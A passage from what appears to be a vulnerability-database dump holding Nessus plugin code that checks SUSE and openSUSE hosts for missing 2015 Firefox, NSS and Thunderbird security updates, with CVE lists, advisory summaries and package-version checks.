12:03:38\");\n\n script_cve_id(\"CVE-2015-4473\", \"CVE-2015-4474\", \"CVE-2015-4475\", \"CVE-2015-4478\", \"CVE-2015-4479\", \"CVE-2015-4484\", \"CVE-2015-4485\", \"CVE-2015-4486\", \"CVE-2015-4487\", \"CVE-2015-4488\", \"CVE-2015-4489\", \"CVE-2015-4491\", \"CVE-2015-4492\", \"CVE-2015-4495\");\n\n script_name(english:\"SUSE SLED11 / SLES11 Security Update : MozillaFirefox, mozilla-nss (SUSE-SU-2015:1528-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox is being updated to the current Firefox 38ESR branch\n(specifically the 38.2.0ESR release).\n\nSecurity issues fixed :\n\n - MFSA 2015-78 / CVE-2015-4495: Same origin violation and\n local file stealing via PDF reader\n\n - MFSA 2015-79 / CVE-2015-4473/CVE-2015-4474:\n Miscellaneous memory safety hazards (rv:40.0 / rv:38.2)\n\n - MFSA 2015-80 / CVE-2015-4475: Out-of-bounds read with\n malformed MP3 file\n\n - MFSA 2015-82 / CVE-2015-4478: Redefinition of\n non-configurable JavaScript object properties\n\n - MFSA 2015-83 / CVE-2015-4479: Overflow issues in\n libstagefright\n\n - MFSA 2015-87 / CVE-2015-4484: Crash when using shared\n memory in JavaScript\n\n - MFSA 2015-88 / CVE-2015-4491: Heap overflow in\n gdk-pixbuf when scaling bitmap images\n\n - MFSA 2015-89 / CVE-2015-4485/CVE-2015-4486: Buffer\n overflows on Libvpx when decoding WebM video\n\n - MFSA 2015-90 /\n CVE-2015-4487/CVE-2015-4488/CVE-2015-4489:\n Vulnerabilities found through code inspection\n\n - MFSA 2015-92 / CVE-2015-4492: Use-after-free in\n XMLHttpRequest with shared workers\n\nThis update also contains a lot of feature improvements and bug fixes\nfrom 31ESR to 38ESR.\n\nAlso the Mozilla NSS library switched its CKBI API from 1.98 to 2.4,\nwhich is what Firefox 38ESR uses.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4473/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4474/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4475/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4478/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4479/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4484/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4485/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4486/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4487/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4488/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4489/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4491/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4492/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4495/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151528-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d87736ce\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-firefox38-20150820-12083=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP3 :\n\nzypper in -t patch sdksp3-firefox38-20150820-12083=1\n\nSUSE Linux Enterprise Server for VMWare 11-SP3 :\n\nzypper in -t patch slessp3-firefox38-20150820-12083=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-firefox38-20150820-12083=1\n\nSUSE Linux Enterprise Server 11-SP3 :\n\nzypper in -t patch slessp3-firefox38-20150820-12083=1\n\nSUSE Linux Enterprise Desktop 11-SP4 :\n\nzypper in -t patch sledsp4-firefox38-20150820-12083=1\n\nSUSE Linux Enterprise Desktop 11-SP3 :\n\nzypper in -t patch sledsp3-firefox38-20150820-12083=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-firefox38-20150820-12083=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-firefox38-20150820-12083=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-branding-SLED\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsoftokn3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED11|SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11 / SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! ereg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED11\" && (! ereg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libfreebl3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libsoftokn3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"mozilla-nss-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"MozillaFirefox-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"MozillaFirefox-branding-SLED-31.0-0.12.51\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"MozillaFirefox-translations-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libfreebl3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libsoftokn3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"mozilla-nss-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"mozilla-nss-tools-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libfreebl3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libsoftokn3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"mozilla-nss-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"MozillaFirefox-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"MozillaFirefox-branding-SLED-31.0-0.12.51\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"MozillaFirefox-translations-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libfreebl3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libsoftokn3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"mozilla-nss-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"mozilla-nss-tools-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"MozillaFirefox-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"MozillaFirefox-branding-SLED-31.0-0.12.51\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"MozillaFirefox-translations-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"libfreebl3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"libsoftokn3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"mozilla-nss-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"mozilla-nss-tools-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"MozillaFirefox-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"MozillaFirefox-branding-SLED-31.0-0.12.51\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"MozillaFirefox-translations-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"libfreebl3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"libsoftokn3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"mozilla-nss-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"mozilla-nss-tools-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"MozillaFirefox-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"MozillaFirefox-branding-SLED-31.0-0.12.51\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"MozillaFirefox-translations-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"libfreebl3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"libsoftokn3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"mozilla-nss-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"mozilla-nss-tools-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"MozillaFirefox-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"MozillaFirefox-branding-SLED-31.0-0.12.51\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"MozillaFirefox-translations-38.2.1esr-19.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"libfreebl3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"libsoftokn3-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"mozilla-nss-3.19.2.0-0.16.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"mozilla-nss-tools-3.19.2.0-0.16.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox / mozilla-nss\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:59", "bulletinFamily": "scanner", "description": "This update to Thunderbird 38.2.0 fixes the following issues (bnc#940806) :\n\n - MFSA 2015-79/CVE-2015-4473 Miscellaneous memory safety hazards\n\n - MFSA 2015-80/CVE-2015-4475 (bmo#1175396) Out-of-bounds read with malformed MP3 file\n\n - MFSA 2015-82/CVE-2015-4478 (bmo#1105914) Redefinition of non-configurable JavaScript object properties\n\n - MFSA 2015-83/CVE-2015-4479/CVE-2015-4480/CVE-2015-4493 Overflow issues in libstagefright\n\n - MFSA 2015-84/CVE-2015-4481 (bmo1171518) Arbitrary file overwriting through Mozilla Maintenance Service with hard links (only affected Windows)\n\n - MFSA 2015-85/CVE-2015-4482 (bmo#1184500) Out-of-bounds write with Updater and malicious MAR file (does not affect openSUSE RPM packages which do not ship the updater)\n\n - MFSA 2015-87/CVE-2015-4484 (bmo#1171540) Crash when using shared memory in JavaScript\n\n - MFSA 2015-88/CVE-2015-4491 (bmo#1184009) Heap overflow in gdk-pixbuf when scaling bitmap images\n\n - MFSA 2015-89/CVE-2015-4485/CVE-2015-4486 (bmo#1177948, bmo#1178148) Buffer overflows on Libvpx when decoding WebM video\n\n - MFSA 2015-90/CVE-2015-4487/CVE-2015-4488/CVE-2015-4489 Vulnerabilities found through code inspection\n\n - MFSA 2015-92/CVE-2015-4492 (bmo#1185820) Use-after-free in XMLHttpRequest with shared workers", "modified": "2015-08-31T00:00:00", "id": "OPENSUSE-2015-559.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=85703", "published": "2015-08-31T00:00:00", "title": "openSUSE Security Update : MozillaThunderbird (openSUSE-2015-559)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-559.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85703);\n script_version(\"$Revision: 2.1 $\");\n script_cvs_date(\"$Date: 2015/08/31 14:21:58 $\");\n\n script_cve_id(\"CVE-2015-4473\", \"CVE-2015-4475\", \"CVE-2015-4478\", \"CVE-2015-4479\", \"CVE-2015-4480\", \"CVE-2015-4481\", \"CVE-2015-4482\", \"CVE-2015-4484\", \"CVE-2015-4485\", \"CVE-2015-4486\", \"CVE-2015-4487\", \"CVE-2015-4488\", \"CVE-2015-4489\", \"CVE-2015-4491\", \"CVE-2015-4492\", \"CVE-2015-4493\");\n\n script_name(english:\"openSUSE Security Update : MozillaThunderbird (openSUSE-2015-559)\");\n script_summary(english:\"Check for the openSUSE-2015-559 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to Thunderbird 38.2.0 fixes the following issues\n(bnc#940806) :\n\n - MFSA 2015-79/CVE-2015-4473 Miscellaneous memory safety\n hazards\n\n - MFSA 2015-80/CVE-2015-4475 (bmo#1175396) Out-of-bounds\n read with malformed MP3 file\n\n - MFSA 2015-82/CVE-2015-4478 (bmo#1105914) Redefinition of\n non-configurable JavaScript object properties\n\n - MFSA 2015-83/CVE-2015-4479/CVE-2015-4480/CVE-2015-4493\n Overflow issues in libstagefright\n\n - MFSA 2015-84/CVE-2015-4481 (bmo1171518) Arbitrary file\n overwriting through Mozilla Maintenance Service with\n hard links (only affected Windows)\n\n - MFSA 2015-85/CVE-2015-4482 (bmo#1184500) Out-of-bounds\n write with Updater and malicious MAR file (does not\n affect openSUSE RPM packages which do not ship the\n updater)\n\n - MFSA 2015-87/CVE-2015-4484 (bmo#1171540) Crash when\n using shared memory in JavaScript\n\n - MFSA 2015-88/CVE-2015-4491 (bmo#1184009) Heap overflow\n in gdk-pixbuf when scaling bitmap images\n\n - MFSA 2015-89/CVE-2015-4485/CVE-2015-4486 (bmo#1177948,\n bmo#1178148) Buffer overflows on Libvpx when decoding\n WebM video\n\n - MFSA 2015-90/CVE-2015-4487/CVE-2015-4488/CVE-2015-4489\n Vulnerabilities found through code inspection\n\n - MFSA 2015-92/CVE-2015-4492 (bmo#1185820) Use-after-free\n in XMLHttpRequest with shared workers\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=940806\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaThunderbird packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-38.2.0-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-buildsymbols-38.2.0-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-debuginfo-38.2.0-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-debugsource-38.2.0-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-devel-38.2.0-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-translations-common-38.2.0-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-translations-other-38.2.0-25.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaThunderbird / MozillaThunderbird-buildsymbols / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:59", "bulletinFamily": "scanner", "description": "This update to Thunderbird 38.2.0 fixes the following issues (bnc#940806) :\n\n - MFSA 2015-79/CVE-2015-4473 Miscellaneous memory safety hazards\n\n - MFSA 2015-80/CVE-2015-4475 (bmo#1175396) Out-of-bounds read with malformed MP3 file\n\n - MFSA 2015-82/CVE-2015-4478 (bmo#1105914) Redefinition of non-configurable JavaScript object properties\n\n - MFSA 2015-83/CVE-2015-4479/CVE-2015-4480/CVE-2015-4493 Overflow issues in libstagefright\n\n - MFSA 2015-84/CVE-2015-4481 (bmo1171518) Arbitrary file overwriting through Mozilla Maintenance Service with hard links (only affected Windows)\n\n - MFSA 2015-85/CVE-2015-4482 (bmo#1184500) Out-of-bounds write with Updater and malicious MAR file (does not affect openSUSE RPM packages which do not ship the updater)\n\n - MFSA 2015-87/CVE-2015-4484 (bmo#1171540) Crash when using shared memory in JavaScript\n\n - MFSA 2015-88/CVE-2015-4491 (bmo#1184009) Heap overflow in gdk-pixbuf when scaling bitmap images\n\n - MFSA 2015-89/CVE-2015-4485/CVE-2015-4486 (bmo#1177948, bmo#1178148) Buffer overflows on Libvpx when decoding WebM video\n\n - MFSA 2015-90/CVE-2015-4487/CVE-2015-4488/CVE-2015-4489 Vulnerabilities found through code inspection\n\n - MFSA 2015-92/CVE-2015-4492 (bmo#1185820) Use-after-free in XMLHttpRequest with shared workers", "modified": "2015-08-31T00:00:00", "id": "OPENSUSE-2015-558.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=85702", "published": "2015-08-31T00:00:00", "title": "openSUSE Security Update : MozillaThunderbird (openSUSE-2015-558)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-558.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85702);\n script_version(\"$Revision: 2.1 $\");\n script_cvs_date(\"$Date: 2015/08/31 14:21:58 $\");\n\n script_cve_id(\"CVE-2015-4473\", \"CVE-2015-4475\", \"CVE-2015-4478\", \"CVE-2015-4479\", \"CVE-2015-4480\", \"CVE-2015-4481\", \"CVE-2015-4482\", \"CVE-2015-4484\", \"CVE-2015-4485\", \"CVE-2015-4486\", \"CVE-2015-4487\", \"CVE-2015-4488\", \"CVE-2015-4489\", \"CVE-2015-4491\", \"CVE-2015-4492\", \"CVE-2015-4493\");\n\n script_name(english:\"openSUSE Security Update : MozillaThunderbird (openSUSE-2015-558)\");\n script_summary(english:\"Check for the openSUSE-2015-558 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to Thunderbird 38.2.0 fixes the following issues\n(bnc#940806) :\n\n - MFSA 2015-79/CVE-2015-4473 Miscellaneous memory safety\n hazards\n\n - MFSA 2015-80/CVE-2015-4475 (bmo#1175396) Out-of-bounds\n read with malformed MP3 file\n\n - MFSA 2015-82/CVE-2015-4478 (bmo#1105914) Redefinition of\n non-configurable JavaScript object properties\n\n - MFSA 2015-83/CVE-2015-4479/CVE-2015-4480/CVE-2015-4493\n Overflow issues in libstagefright\n\n - MFSA 2015-84/CVE-2015-4481 (bmo1171518) 